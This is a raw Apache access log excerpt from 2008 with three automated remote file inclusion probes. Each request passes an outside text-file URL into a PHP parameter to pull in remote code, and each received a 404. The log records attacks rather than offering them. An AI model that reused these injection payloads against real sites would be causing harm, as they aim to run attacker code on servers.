217.20.138.101 - - [07/Aug/2008:05:15:57 -0500] "GET /logs//squirrelcart/cart.php//popup_window.php?site_isp_root=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
212.92.23.89 - - [07/Aug/2008:05:16:10 -0500] "GET /logs//errors.php?error=http://www.superchristensen.com/images/id.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
89.111.179.10 - - [07/Aug/2008:05:16:34 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
